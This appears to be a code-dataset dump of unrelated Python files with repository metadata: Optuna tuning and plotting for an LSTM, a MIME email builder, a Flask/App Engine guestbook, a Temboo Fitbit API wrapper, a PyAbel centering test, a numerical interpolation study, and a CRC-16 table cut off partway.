batch_size = trial.suggest_categorical("batch_size", [32, 64, 96, 128])
epochs = trial.suggest_int("epochs", 5, 30)
lr = trial.suggest_loguniform("lr", 1e-5, 1e-1)
model = Sequential()
model.add(LSTM(units=units,
input_shape=input_shape,
dropout=dropout))
model.add(Dense(num_labels, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(lr=lr),
metrics=['accuracy'])
model.fit(x_train,y_train,batch_size=batch_size,epochs=epochs,verbose=0,
validation_data=(x_valid,y_valid), callbacks=[TFKerasPruningCallback(trial, 'val_loss')])
#validation_data=(x_valid,y_valid), callbacks=None)
# Evaluate the model accuracy on the validation set.
score = model.evaluate(x_valid,y_valid,batch_size=batch_size,verbose=0)
return score[1]
study = optuna.create_study(direction="maximize")
study.optimize(objective, n_trials=100, timeout=21600)
print("Number of finished trials: {}".format(len(study.trials)))
df_trial = study.trials_dataframe(attrs=('number', 'value', 'params', 'state'))
print(df_trial)
trial_file = os.path.join(result_dir,feature+'_'+model_type+'_trial.csv')
print ("Storing trial into a file: "+trial_file)
df_trial.to_csv(trial_file)
print("Best trial:")
best_trial = study.best_trial
print(" Value: {}".format(best_trial.value))
print(" Params: ")
for key, value in best_trial.params.items():
print(" {}: {}".format(key, value))
best_trial_file = os.path.join(result_dir,feature+'_'+model_type+'_best_trial.pkl')
print ("Storing best trial into a file: "+best_trial_file)
with open(best_trial_file, 'wb') as f:
pickle.dump(best_trial, f)
# open and plot hyperparameter optmisation results
trial_file = os.path.join(result_dir,feature+'_'+model_type+'_trial.csv')
print ("Loading trial from a file: "+trial_file)
df_trial = pd.read_csv(trial_file,index_col=0)
dropout_space = [0, 0.1, 0.2, 0.3, 0.4]
params_units = df_trial['params_units'].to_numpy()
params_epochs = df_trial['params_epochs'].to_numpy()
params_batch_size = df_trial['params_batch_size'].to_numpy()
params_dropout = df_trial['params_dropout'].to_numpy()
params_lr = df_trial['params_lr'].to_numpy()
accuracy = df_trial['value'].to_numpy()
label = ['Units','Epochs','Batch Size','Dropout Rate','Learning Rate']
hyperparam = [params_units, params_epochs,params_batch_size,params_dropout,params_lr]
num_hyperparam = len(hyperparam)
color = cm.gist_rainbow(np.linspace(0.,1.,num_hyperparam))
batch_idx_32 = np.where(params_batch_size==32)[0]
batch_idx_64 = np.where(params_batch_size==64)[0]
batch_idx_96 = np.where(params_batch_size==96)[0]
batch_idx_128 = np.where(params_batch_size==128)[0]
batch_idx = [batch_idx_32, batch_idx_64, batch_idx_96, batch_idx_128]
cbarlabel = 'Accuracy'
dropout_size = params_dropout*100 + 20
cmap = 'cool'
fig = plt.figure(figsize=(14,4))
plt.subplots_adjust(wspace=0)
ax0 = fig.add_subplot(1,4,1,projection='3d')
scat = ax0.scatter3D(params_units[batch_idx[0]],params_epochs[batch_idx[0]],params_lr[batch_idx[0]],c=accuracy[batch_idx[0]],
s=dropout_size[batch_idx[0]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax0,xlabel='Units',ylabel='Epochs',zlabel='')
ax1 = fig.add_subplot(1,4,2,projection='3d')
scat = ax1.scatter3D(params_units[batch_idx[1]],params_epochs[batch_idx[1]],params_lr[batch_idx[1]],c=accuracy[batch_idx[1]],
s=dropout_size[batch_idx[1]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax1,xlabel='Units',ylabel='Epochs',zlabel='')
ax2 = fig.add_subplot(1,4,3,projection='3d')
scat = ax2.scatter3D(params_units[batch_idx[2]],params_epochs[batch_idx[2]],params_lr[batch_idx[2]],c=accuracy[batch_idx[2]],
s=dropout_size[batch_idx[2]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax2,xlabel='Units',ylabel='Epochs',zlabel='')
ax3 = fig.add_subplot(1,4,4,projection='3d')
scat = ax3.scatter3D(params_units[batch_idx[3]],params_epochs[batch_idx[3]],params_lr[batch_idx[3]],c=accuracy[batch_idx[3]],
s=dropout_size[batch_idx[3]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax3,xlabel='Units',ylabel='Epochs',zlabel='')
ax3.text(325,32,0.00075,'Learn Rate',zdir='z',fontsize=12,rotation=0,va='bottom',ha='left')
#ax2.zaxis.set_label_coords(0,0)
leg_idx = legend_idx(params_dropout,dropout_space)
for i in range(len(leg_idx)):
ax1.scatter3D(params_units[leg_idx[i]],params_epochs[leg_idx[i]],params_lr[leg_idx[i]],c=np.array([accuracy[leg_idx[i]]]),
s=dropout_size[leg_idx[i]],cmap=cmap,vmin=0, vmax=1, label=str(dropout_space[i]))
plot_legend(ax1,leg_idx)
cbax = fig.add_axes([0.94, 0.2, 0.01, 0.55])
cbar = fig.colorbar(scat,cax=cbax)
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom",fontsize=12)
axes = [ax0, ax1, ax2, ax3]
ax_idx = ['batch 32','batch 64','batch 96','batch 128']
x = [250,250,250,250]
y = [0,0,0,5]
z = [-0.015,-0.01,-0.025,-0.002]
for i in range(4):
axes[i].text(x[i], y[i], z[i], ax_idx[i], fontsize=12,fontweight='bold', va='top')
| [
"noreply@github.com"
] | noreply@github.com |
0e00d7b9dfd12f62cf14341e65cd37786e0b1482 | f687b45b061a0a4ed849d5d56e265a3423c95f56 | /mime_gen_both.py | 9f8121e8b8ff5edba0344a98ab758923591037af | [] | no_license | wwwlwscom/python | 45e52529fffccf161a0cff8aaf2d19a149ac2056 | 5478329f068f9a4eff5c07eee8005318b41b6440 | refs/heads/master | 2021-01-20T10:06:17.251976 | 2015-10-20T20:03:34 | 2015-10-20T20:03:34 | 41,769,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | #!/usr/bin/env python
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email import Utils, Encoders
import mimetypes, sys
def genpart(data, contenttype):
maintype, subtype = contenttype.split('/')
if maintype == 'text':
retval = MIMEText(data, _subtype=subtype)
else:
retval = MIMEBase(maintype, subtype)
retval.set_payload(data)
Encoders.encode_base64(retval)
return retval
def attachment(filename):
fd = open(filename, 'rb')
mimetype, mimeencoding = mimetypes.guess_type(filename)
if mimeencoding or (mimetype is None):
mimetype = 'application/octet-stream'
retval = genpart(fd.read(), mimetype)
retval.add_header('Content-Disposition', 'attachment', filename = filename)
fd.close()
return retval
message = """Hello,
This is a test message from Rock. I hope you enjoy it!
--Anonymous"""
messagehtml = """Hello,<P>
This is a <B>great</B>test message from Rock. I hope you enjoy it!<P>
--<I>Anonymous<I>"""
msg = MIMEMultipart()
msg['To'] = 'recipient@example.com'
msg['From'] = 'Test Sender <sender@example.com>'
msg['Subject'] = 'Test Message, Rock'
msg['Date'] = Utils.formatdate(localtime = 1)
msg['Message-ID'] = Utils.make_msgid()
body = MIMEMultipart('alternative')
body.attach(genpart(message, 'text/plain'))
body.attach(genpart(messagehtml, 'text/html'))
msg.attach(body)
for filename in sys.argv[1:]:
msg.attach(attachment(filename))
print msg.as_string()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
9e304994375f0455b78a9d29d08791808a9cccc8 | 6b77fc3e8a2b919483723c02ab47681f6c487caa | /main.py | 30ccf696cee9f3e806a1491e43f53d4984ec88ab | [] | no_license | kazato110tm/gcp_python_app | 1d94482eda88e176364ceb6d1d6be39676780df5 | 1a5a2ea65ad82da8a7261d84908faa136fb067d3 | refs/heads/master | 2022-12-06T21:53:56.408582 | 2020-08-23T16:01:10 | 2020-08-23T16:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START app]
import logging
from flask import Flask, redirect, request, render_template
from google.appengine.ext import ndb
class Message(ndb.Model):
body = ndb.StringProperty()
created = ndb.DateTimeProperty(auto_now_add=True)
app = Flask(__name__)
@app.route('/')
def hello():
messages = Message.query().fetch()
return render_template('hello.html', messages=messages)
@app.route('/add', methods=['POST'])
def add_message():
message_body = request.form.get('message', '')
message = Message(body=message_body)
message.put()
return redirect('/')
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request.')
return 'An internal error occurred.', 500
# [END app]
| [
"deguchi.k.110@gmail.com"
] | deguchi.k.110@gmail.com |
c63fff8d99a3dc4b7fc547ac13a5fde5ce61b21f | 8a25ada37271acd5ea96d4a4e4e57f81bec221ac | /home/pi/GrovePi/Software/Python/others/temboo/Library/Fitbit/Social/CreateInvite.py | ad0fa7c6517b0cc3e0e04b248b8071b8d35346b8 | [
"MIT",
"Apache-2.0"
] | permissive | lupyuen/RaspberryPiImage | 65cebead6a480c772ed7f0c4d0d4e08572860f08 | 664e8a74b4628d710feab5582ef59b344b9ffddd | refs/heads/master | 2021-01-20T02:12:27.897902 | 2016-11-17T17:32:30 | 2016-11-17T17:32:30 | 42,438,362 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 5,095 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# CreateInvite
# Invites a user to become friends with authorized user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class CreateInvite(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the CreateInvite Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(CreateInvite, self).__init__(temboo_session, '/Library/Fitbit/Social/CreateInvite')
def new_input_set(self):
return CreateInviteInputSet()
def _make_result_set(self, result, path):
return CreateInviteResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return CreateInviteChoreographyExecution(session, exec_id, path)
class CreateInviteInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the CreateInvite
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessTokenSecret(self, value):
"""
Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process.)
"""
super(CreateInviteInputSet, self)._set_input('AccessTokenSecret', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
"""
super(CreateInviteInputSet, self)._set_input('AccessToken', value)
def set_ConsumerKey(self, value):
"""
Set the value of the ConsumerKey input for this Choreo. ((required, string) The Consumer Key provided by Fitbit.)
"""
super(CreateInviteInputSet, self)._set_input('ConsumerKey', value)
def set_ConsumerSecret(self, value):
"""
Set the value of the ConsumerSecret input for this Choreo. ((required, string) The Consumer Secret provided by Fitbit.)
"""
super(CreateInviteInputSet, self)._set_input('ConsumerSecret', value)
def set_InvitedUserEmail(self, value):
"""
Set the value of the InvitedUserEmail input for this Choreo. ((conditional, string) The email address of the user to invite; user can be a Fitbit member already. Required unless providing the InvitedUserID.)
"""
super(CreateInviteInputSet, self)._set_input('InvitedUserEmail', value)
def set_InvitedUserID(self, value):
"""
Set the value of the InvitedUserID input for this Choreo. ((conditional, string) The Fitbit user id of the user to send an invite to. Required unless providing the InvitedUserEmail.)
"""
super(CreateInviteInputSet, self)._set_input('InvitedUserID', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that you want the response to be in: xml or json. Defaults to json.)
"""
super(CreateInviteInputSet, self)._set_input('ResponseFormat', value)
def set_UserID(self, value):
"""
Set the value of the UserID input for this Choreo. ((optional, string) The user's encoded id. Defaults to "-" (dash) which will return data for the user associated with the token credentials provided.)
"""
super(CreateInviteInputSet, self)._set_input('UserID', value)
class CreateInviteResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the CreateInvite Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Fitbit.)
"""
return self._output.get('Response', None)
class CreateInviteChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return CreateInviteResultSet(response, path)
| [
"lupyuen@gmail.com"
] | lupyuen@gmail.com |
67ffd9c692b0207ce65232a7eec862d400e10e60 | 89be3dbe4973f65b17a98780f5b0edce2b3634b0 | /abel/tests/test_tools_center.py | 3bd695c474f386df2c5535e1cf57a56305d97a9f | [
"MIT"
] | permissive | Yarubaobei/PyAbel | 0b53daf496dbc0e88547d166267285d72306c702 | 8c881b59a36ed5bd8ad841e38dc942c23c0ff112 | refs/heads/master | 2020-05-19T05:40:47.176636 | 2019-05-04T05:24:20 | 2019-05-04T05:24:20 | 184,854,479 | 0 | 0 | MIT | 2019-05-04T05:06:37 | 2019-05-04T05:06:37 | null | UTF-8 | Python | false | false | 1,792 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from numpy.testing import assert_allclose
import abel
from scipy.ndimage.interpolation import shift
def test_center_image():
# BASEX sample image, Gaussians at 10, 15, 20, 70,85, 100, 145, 150, 155
# image width, height n = 361, center = (180, 180)
IM = abel.tools.analytical.SampleImage(n=361, name="dribinski").image
# artificially displace center, now at (179, 182)
IMx = shift(IM, (-1, 2))
true_center = (179, 182)
# find_center using 'slice' method
center = abel.tools.center.find_center(IMx, center="slice")
assert_allclose(center, true_center, atol=1)
# find_center using 'com' method
center = abel.tools.center.find_center(IMx, center="com")
assert_allclose(center, true_center, atol=1)
# check single axis - vertical
# center shifted image IMx in the vertical direction only
IMc = abel.tools.center.center_image(IMx, center="com", axes=1)
# determine the center
center = abel.tools.center.find_center(IMc, center="com")
assert_allclose(center, (179, 180), atol=1)
# check single axis - horizontal
# center shifted image IMx in the horizontal direction only
IMc = abel.tools.center.center_image(IMx, center="com", axes=0)
center = abel.tools.center.find_center(IMc, center="com")
assert_allclose(center, (180, 182), atol=1)
# check even image size returns odd
# drop off one column, to make an even column image
IM = IM[:, :-1]
m, n = IM.shape
IMy = abel.tools.center.center_image(IM, center="slice", odd_size=True)
assert_allclose(IMy.shape, (m, n-1))
if __name__ == "__main__":
test_center_image()
| [
"Stephen.Gibson@anu.edu.au"
] | Stephen.Gibson@anu.edu.au |
002330b328f74d714aa97ba917e8782c833ab8da | 92c7311a8c145b2d415901991a459bf7d2734929 | /src/web/Result.py | d6cac504f8c02f8e040af32d4e04cdcf39c4d2b1 | [] | no_license | liuyanglxh/py-web | 3aa1043b672a034d548bce7042c8e0cf8faa24b2 | 441ed2077faeabf38f1449762a6ce692bb6a1115 | refs/heads/master | 2022-11-20T15:37:39.612580 | 2020-05-29T10:41:32 | 2020-05-29T10:41:32 | 267,832,787 | 0 | 0 | null | 2022-11-17T15:08:32 | 2020-05-29T10:40:30 | Python | UTF-8 | Python | false | false | 349 | py | from flask import json
class Result(object):
success = True
data = None
code = 200
def __init__(self, success, data, code):
self.success = success
self.data = data
self.code = code
r = Result(True, "a", 200)
print json.dumps(r, default=lambda o: o.__dict__, sort_keys=True, indent=4, ensure_ascii=False)
| [
"yang.liu@mail.dealmoon.com"
] | yang.liu@mail.dealmoon.com |
7c6fc5bd03e1385e6cf3dcf99c83d1f366d599fb | ce72b098359697eb28628848ec13f736f29366fa | /10-11_like_number_1.py | 1d4d7fef40c7c08b8efc1dad28a2b51c1358d64c | [] | no_license | TCmatj/learnpython | 1e9ab09deebda025ee4cdd1a465815fcd0594f48 | d92b38a760b29f26efba1f4770ab822aba454931 | refs/heads/master | 2023-01-31T18:19:56.211173 | 2020-12-14T03:06:35 | 2020-12-14T03:06:35 | 298,828,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # TC 2020/10/11/21:39
import json
filename = 'json\\like_number.json'
number = int(input("输入喜欢的数字:"))
with open(filename,'w') as fm:
json.dump(number,fm) | [
"2216685752@qq.com"
] | 2216685752@qq.com |
76b298420595288e18d020473760727475db4570 | 3e6d90546509004d836b4a74df93c9d1515529a0 | /Interpolazione.py | 6e7821a583fda9e05fe5c8f0f525372fc9047150 | [] | no_license | pelagos91/UniBa-Calcolo-Numerico-ICD | 8a05438837a17ffe13ddc684ef187b340ac8f21a | 969c3deeaf184c81df956756b7157b398944a28c | refs/heads/master | 2021-01-10T05:32:48.845826 | 2016-01-26T22:25:41 | 2016-01-26T22:25:41 | 50,463,061 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,269 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 13 09:25:54 2015
@author: pelag
"""
import numpy as np
import scipy.linalg as las
import matplotlib.pylab as plt
import scipy.interpolate as interpolate
def lagrange(xnodi,fnodi,x):
"""
Funzione che determina in un insieme di punti
il valore del polinomio interpolante ottenuto
dalla formula di Lagrange e la funzione di Lebesgue
f,L = lagrange(xnodi,fnodi,x)
Dati di input:
xnodi vettore con i nodi dell'interpolazione
fnodi vettore con i valori nei nodi
x vettore con i punti in cui si vuole
calcolare il valore del polinomio
interpolante
Dati di output:
f vettore contenente i valori assunti
dal polinomio interpolante
L vettore contenente i valori assunti dalla
funzione di lebesgue in x
"""
n=xnodi.shape[0]
m=x.shape[0]
l=np.zeros([n,m])
ind=np.zeros([n,n-1],dtype=int)
ind[0,:]=np.arange(1,n)
for i in range(1,(n)):
ind[i,0:(n-1)]=np.floor(np.concatenate((np.arange(0,(i)),np.arange(i+1,n))))
ind[n-1,:]=np.arange(0,n-1)
for i in range(0,n):
den = np.prod( xnodi[i]-xnodi[(ind[i,:])])
for j in range(0,m):
l[i,j]=np.prod( x[j] - xnodi[ind[i,:]] )/den
y = np.sum(np.dot(np.diag(fnodi),l),axis=0) #Vettore di punti del olinomio interpolante
L=np.sum(abs(l),axis=0) #Funzione di Lebesgue
return y,L
def potenze(xnodi,fnodi,xx):
"""
Funzione che determina in un insieme di punti
il valore del polinomio interpolante ottenuto
dalla formula di Lagrange e la funzione di Lebesgue
f = potenze(xnodi,fnodi,x)
Dati di input:
xnodi vettore con i nodi dell'interpolazione
fnodi vettore con i valori nei nodi
x vettore con i punti in cui si vuole
calcolare il valore del polinomio
interpolante
Dati di output:
f vettore contenente i valori assunti
dal polinomio interpolante
"""
n=xnodi.shape[0]
A=np.zeros([n,n]) #Matrice di Vandermonde
for j in range(0,n):
A[:,j]=xnodi**(j)
p = las.solve(A,fnodi)
f = np.polyval(p[np.arange(n-1,-1,-1)],xx)
condA = np.linalg.cond(A, np.inf)
return f, condA
def cheby(a,b,n):
"""
Nodi di Chebyshev
"""
c = (a + b + (b-a)*np.cos((2*(np.arange(0,n+1))+1)*np.pi/(2*(n+1))))/2
return c
def runge(x):
"""
Funzione di Runge
"""
y=1/(1+25*x**2)
return y
def plotinterp(ftype,a,b,n,tn,baseType):
"""
plot del polinomio interpolante di grado n la funzione
f in [a,b] usando n+1 nodi equidistanti se tn=0
n+1 nodi di Chebyshev se tn=1
ftype indica quale delle due funzioni utilizzare:
- 0 per la funzione coseno
- 1 per la funzione di Runge
baseType indica il tipo di base usata:
- 0 per la base di Lagrange
- 1 per la base delle potenze
"""
if (tn==0):
xnodi = np.linspace(a,b,n+1)
else:
xnodi = cheby(a,b,n)
if (ftype==0):
fname='f=cos(x)'
f=np.cos
fnodi = f(xnodi)
xx = np.linspace(a,b,500)
ye = f(xx)
else:
fname='g=1/(1+25*(x**2))'
fnodi = gfunction(xnodi)
xx = np.linspace(a,b,500)
ye = gfunction(xx)
if(baseType==0):
fi, L = lagrange(xnodi,fnodi,xx)
Lc = las.norm(L, np.inf)
else:
fi, condA = potenze(xnodi, fnodi, xx)
error = np.max(np.abs(fi-ye))
if(baseType==0):
plt.figure(1)
plt.cla()
plt.title('Polinomio interpolante per la funzione %s con n= %i'%(fname, n))
plt.plot(xx,fi,xnodi,fnodi,'o',xx,ye,'--')
plt.figure(2)
plt.cla()
plt.plot(xx,L)
plt.show()
else:
plt.figure(1)
plt.cla()
plt.title('Polinomio interpolante per la funzione %s con n= %i'%(fname, n))
plt.plot(xx,fi,xnodi,fnodi,'o',xx,ye,'--')
plt.show()
if(baseType==0):
return error, Lc
else:
return error, condA
def splineFunction(xnodi,fnodi, xx, fType, sType):
if(sType==0):
s1 = interpolate.interp1d(xnodi, fnodi, 'linear')
sname='lineare'
else:
s1 = interpolate.interp1d(xnodi, fnodi, 'cubic')
sname='cubica'
if(fType==0):
fname='f=cos(x)'
else:
fname='g=1/(1+25*(x**2))'
ys = s1(xx)
error.append(np.max(np.abs(ys-yy)))
plt.figure(i)
plt.cla()
plt.title('Spline %s per la funzione %s' %(sname,fname))
plt.plot(xx,ys,xnodi,fnodi,'o',xx,yy,'--')
plt.show()
def gfunction(x_variable):
return 1/(1+25*(x_variable**2))
print("________________________________")
print("| POTENZE NODI EQUIDISTANTI |")
print("|______________________________|")
#prima funzione per n=4
a=0
b=2
n=4
numeroCondA = np.zeros([4,2])#Vettore in cui avviene lo store dei numeri di condizione della matrice A
numeroCondA[0]= plotinterp(0,a,b,n,0,1)
#prima funzione per n=16
n=16
numeroCondA[1] = plotinterp(0,a,b,n,0,1)
#seconda funzione per n=4
a = -1
b = 1
n=4
numeroCondA[2] = plotinterp(1,a,b,n,0,1)
#seconda funzione per n=16
n=16
numeroCondA[3] = plotinterp(1,a,b,n,0,1)
for i in range(0,4):
print numeroCondA[i]
print("________________________________")
print("| LAGRANGE NODI EQUIDISTANTI |")
print("|______________________________|")
erroreInterpE = np.zeros([4,2])#Vettore in cui avviene lo store degli errori per nodi equidistanti
#prima funzione per n=4
a = 0
b = 2
n=4
erroreInterpE[0] = plotinterp(0,a,b,n,0,0)
#prima funzione per n=16
n=16
erroreInterpE[1] = plotinterp(0,a,b,n,0,0)
#seconda funzione per n=4
a = -1
b = 1
n = 4
erroreInterpE[2] = plotinterp(1,a,b,n,0,0)
#seconda funzione per n=16
n=16
erroreInterpE[3] = plotinterp(1,a,b,n,0,0)
print("________________________________")
print("| POTENZE NODI DI CHEBYCHEV |")
print("|______________________________|")
#prima funzione per n=4
a=0
b=2
n=4
numeroCondAC = np.zeros([4,2])#Vettore in cui avviene lo store dei numeri di condizione della matrice A
numeroCondAC[0] = plotinterp(0,a,b,n,1,1)
#prima funzione per n=16
n=16
numeroCondAC[1] = plotinterp(0,a,b,n,1,1)
#seconda funzione per n=4
a = -1
b = 1
n=4
numeroCondAC[2] = plotinterp(1,a,b,n,1,1)
#seconda funzione per n=16
n=16
numeroCondAC[3] = plotinterp(1,a,b,n,1,1)
for i in range(0,4):
print numeroCondA[i]
print("_________________________________")
print("| LAGRANGE NODI DI CHEBYCHEV |")
print("|_______________________________|")
erroreInterpC = np.zeros([4,2])#Vettore in cui avviene lo store degli errori per nodi di Chebychev
#prima funzione per n=4
a = 0
b = 2
n=4
erroreInterpC[0] = plotinterp(0,a,b,n,1,0)
#prima funzione per n=16
n=16
erroreInterpC[1] = plotinterp(0,a,b,n,1,0)
#seconda funzione per n=4
a = -1
b = 1
n = 4
erroreInterpC[2] = plotinterp(1,a,b,n,1,0)
#seconda funzione per n=16
n=16
erroreInterpC[3] = plotinterp(1,a,b,n,1,0)
# interplazione con le funzioni spline
#funzione f
#4 nodi
f=np.cos
xx = np.linspace(a,b,200)
yy = f(xx)
error=[]
n=4
xnodi = np.linspace(a,b,n+1)
fnodi = f(xnodi)
splineFunction(xnodi, fnodi, xx, 0, 0)
splineFunction(xnodi, fnodi, xx, 0, 1)
#16 nodi
n=16
xnodi = np.linspace(a,b,n+1)
fnodi = f(xnodi)
splineFunction(xnodi, fnodi, xx, 0, 0)
splineFunction(xnodi, fnodi, xx, 0, 1)
#funzione g
#4 nodi
xx = np.linspace(a,b,200)
yy = gfunction(xx)
n=4
xnodi = np.linspace(a,b,n+1)
fnodi = gfunction(xnodi)
splineFunction(xnodi, fnodi, xx, 1, 0)
splineFunction(xnodi, fnodi, xx, 1, 1)
#16 nodi
n=16
xnodi = np.linspace(a,b,n+1)
fnodi = gfunction(xnodi)
splineFunction(xnodi, fnodi, xx, 1, 0)
splineFunction(xnodi, fnodi, xx, 1, 1)
print
print "ERRORE DELLA SPLINE"
for i in range(0,8):
if (i<4):
print 'Funzione f=cos(x)'
else:
print 'Funzione di Runge'
print error[i]
print("_________________________________")
print("| CONFRONTO ERRORI |")
print("| f = cos(x) |")
print("|_______________________________|")
print("ERRORE | NUMERO DI CONDIZIONE VANDERMONDE/COSTANTE DI LEBESGUE")
print("-----------------------------------------------------------------------------")
print("n = 4")
print("-----------------------------------------------------------------------------")
print numeroCondA[0],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[0],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[0],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[0],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("-----------------------------------------------------------------------------")
print("n = 16")
print("-----------------------------------------------------------------------------")
print numeroCondA[1],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[1],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[1],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[1],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("_________________________________")
print("| CONFRONTO ERRORI |")
print("| g=1/(1+25*(x**2)) |")
print("|_______________________________|")
print("ERRORE | NUMERO DI CONDIZIONE VANDERMONDE/COSTANTE DI LEBESGUE")
print("-----------------------------------------------------------------------------")
print("n = 4")
print("-----------------------------------------------------------------------------")
print numeroCondA[2],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[2],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[2],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[2],"Base di LAGRANGE e nodi di CHEBYCHEV"
print("-----------------------------------------------------------------------------")
print("n = 16")
print("-----------------------------------------------------------------------------")
print numeroCondA[3],"Base delle POTENZE e nodi EQUIDISTANTI"
print numeroCondAC[3],"Base delle POTENZE e nodi di CHEBYCHEV"
print erroreInterpE[3],"Base di LAGRANGE e nodi EQUIDISTANTI"
print erroreInterpC[3],"Base di LAGRANGE e nodi di CHEBYCHEV"
| [
"agopel@gmail.com"
] | agopel@gmail.com |
d26c8d733fd5edcbcf3cdce1accbdc56c474b637 | d245c87a5082027f4b390210e0beae15ce19f321 | /python/crc16.py | d52d40b2e38a314dc0c4278bec53300ed81f03fc | [] | no_license | pazderski/spair-stm32-firmware | 9a85e83f1bbdb3fc55a440f039fc18d98e723815 | 26c3a226a4b7dec3e735ab4712f1ad36b97f4a8b | refs/heads/master | 2021-01-10T05:26:55.284937 | 2020-03-02T22:33:11 | 2020-03-02T22:33:11 | 36,146,152 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,635 | py | #* File: CRC16.PY
#* CRC-16 (reverse) table lookup for Modbus or DF1
#*
INITIAL_MODBUS = 0xFFFF
INITIAL_DF1 = 0x0000
table = (
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
